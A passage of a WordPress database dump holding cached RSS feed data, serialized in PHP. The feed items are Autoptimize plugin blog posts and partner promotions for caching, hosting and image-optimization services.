ohlsson";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:9;a:5:{s:4:"data";s:12:"this weekend";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10380";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:224:"Almost, but exclusively for you guys &#38; girls;<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/e9COTtG7a6o" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:62:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:57:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:60:"How to force Autoptimize to output protocol-relative URL’s";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/1gJ-IhZMIOc/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:100:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 02 Aug 2016 06:07:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"code snippets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:21:"protocol-relative url";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10360";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:476:"Autoptimize by default uses WordPress&#8217; internal logic to determine if a URL should be HTTP or HTTPS. But in some cases WordPress may not be fully aware it is on HTTPS, or maybe you want part of your site HTTP and another part (cart &#038; checkout?) in HTTPS. Protocol-relative URL&#8217;s to...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/1gJ-IhZMIOc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:96:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"8";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:91:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:57:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:42:"Preparing (for) Autoptimize 2.0.3 or 2.1.0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/_sch1G_dAw8/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:83:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 24 Jul 2016 08:46:08 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:6:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:16:"autoptimize beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:4:"beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:4:"test";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10353";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:477:"It&#8217;s that time of the year again where I humbly ask Autoptimize&#8217;s users to download and test the &#8220;beta&#8221;-version of the upcoming release. I&#8217;m not entirely sure whether this should be 2.0.3 (a minor release) or 2.1.0 (a major one), but I&#8217;ll let you guys &#38; girls...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/_sch1G_dAw8" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:79:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"18";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:2:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";s:4:"href";s:42:"http://feeds.feedburner.com/futtta_webtech";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:3:"rel";s:3:"hub";s:4:"href";s:32:"http://pubsubhubbub.appspot.com/";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:3:{s:4:"info";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:1:{s:3:"uri";s:14:"futtta_webtech";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:14:"emailServiceId";a:1:{i:0;a:5:{s:4:"data";s:14:"futtta_webtech";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:18:"feedburnerHostname";a:1:{i:0;a:5:{s:4:"data";s:29:"https://feedburner.google.com";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:10:{s:12:"content-type";s:23:"text/xml; charset=UTF-8";s:4:"etag";s:27:"zz8HW7l+UdMxhCM2wVH1S5JG1/I";s:13:"last-modified";s:29:"Wed, 25 Jan 2017 12:12:54 GMT";s:16:"content-encoding";s:4:"gzip";s:4:"date";s:29:"Wed, 25 Jan 2017 14:07:36 GMT";s:7:"expires";s:29:"Wed, 25 Jan 2017 14:07:36 GMT";s:13:"cache-control";s:18:"private, max-age=0";s:22:"x-content-type-options";s:7:"nosniff";s:16:"x-xss-protection";s:13:"1; mode=block";s:6:"server";s:3:"GSE";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (607590, '_transient_timeout_feed_mod_aed63b76c6b70f6096be5d99f700e3df', '1485396456', 'no'); 
INSERT INTO `wp_options` VALUES (607591, '_transient_feed_mod_aed63b76c6b70f6096be5d99f700e3df', '1485353256', 'no'); 
INSERT INTO `wp_options` VALUES (607592, '_transient_timeout_feed_058fd0b28f87f0adb2bc7ab92e7548f4', '1485396479', 'no'); 
INSERT INTO `wp_options` VALUES (607593, '_transient_feed_058fd0b28f87f0adb2bc7ab92e7548f4', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n	\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:124:"\n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n	\n        \n        \n    ";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:28:"Optimizing Matters Downloads";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:29:"http://optimizingmatters.com/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:28:"Optimizing Matters Downloads";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 22 Jul 2016 09:25:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:30:"https://wordpress.org/?v=4.5.3";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:5:{i:0;a:6:{s:4:"data";s:41:"\n			\n			\n			\n			\n			\n			\n			\n			\n        ";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:19:"Autoptimize SpeedUp";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:29:"http://optimizingmatters.com/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 19 Jun 2016 16:22:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"http://optimizingmatters.com/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:185:"Coming Soon: Autoptimize Power-Up to significantly speed up the creation of optimized CSS and JS, based on entirely new caching logic. Optimizing your site will never have been quicker!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"enclosure";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"url";s:84:"https://optimizingmattersblog.files.wordpress.com/2016/09/optimizingmatters_logo.png";s:6:"length";s:4:"5968";s:4:"type";s:9:"image/png";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:192:"<p>Coming Soon: Autoptimize Power-Up to significantly speed up the creation of optimized CSS and JS, based on entirely new caching logic. Optimizing your site will never have been quicker!</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:41:"\n			\n			\n			\n			\n			\n			\n			\n			\n        ";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:28:"Critical CSS for pro&#039;s!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:75:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=critcss";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 19 Jun 2016 16:22:05 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:75:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=critcss";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:151:"The best tool to generate your "above the fold"-css! Now exclusively with Autoptimize Critical CSS Power-Up to manage your critical CSS per page/ type.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"enclosure";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"url";s:72:"https://optimizingmattersblog.files.wordpress.com/2016/09/critcsscom.png";s:6:"length";s:4:"4000";s:4:"type";s:9:"image/png";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:159:"<p>[The best tool to generate your "above the fold"-css! Now exclusively with Autoptimize Critical CSS Power-Up to manage your critical CSS per page/ type.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:41:"\n			\n			\n			\n			\n			\n			\n			\n			\n        ";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:15:"Comet Cache Pro";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:76:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=cometpro";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 19 Jun 2016 16:23:01 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:76:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=cometpro";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:89:"Advanced page caching with a.o. cache for logged in users, CDN-support and cache warming!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"enclosure";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"url";s:70:"https://optimizingmattersblog.files.wordpress.com/2016/09/cometpro.png";s:6:"length";s:4:"5968";s:4:"type";s:9:"image/png";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:63:"<p>Advanced page caching plugin, one of the best out there!</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:209:"\n                        \n                        \n                        \n                        \n                        \n                        \n                        \n                        \n        ";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:32:"Optimize your WordPress-Hosting!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:78:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=siteground";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 19 Jun 2016 16:23:01 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:78:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=siteground";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:226:"Great managed WordPress hosting at Siteground from 3.95 euro/dollar per month with performance built in; SSD storage, PHP7, HTTP/2. Optionally with SuperCacher for built-in professional pagecaching on GrowBig and GoGeek plans!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"enclosure";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"url";s:77:"https://optimizingmattersblog.files.wordpress.com/2016/09/siteground_logo.png";s:6:"length";s:5:"12031";s:4:"type";s:9:"image/png";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:233:"<p>Great managed WordPress hosting at Siteground from 3.95 euro/dollar per month with performance built in; SSD storage, PHP7, HTTP/2. Optionally with SuperCacher for built-in professional pagecaching on GrowBig and GoGeek plans!</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:209:"\n                        \n                        \n                        \n                        \n                        \n                        \n                        \n                        \n        ";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:37:"Auto-optimize images with ShortPixel!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:78:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=shortpixel";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 19 Jun 2016 16:23:01 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:78:"http://misc.optimizingmatters.com/partners/?from=partnertab&partner=shortpixel";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:209:"Automatically optimizing your images can boost your site\'s performance considerably. Check out how much ShortPixel can save and get 50% extra monthly optimizations when signing up as Autoptimize user! 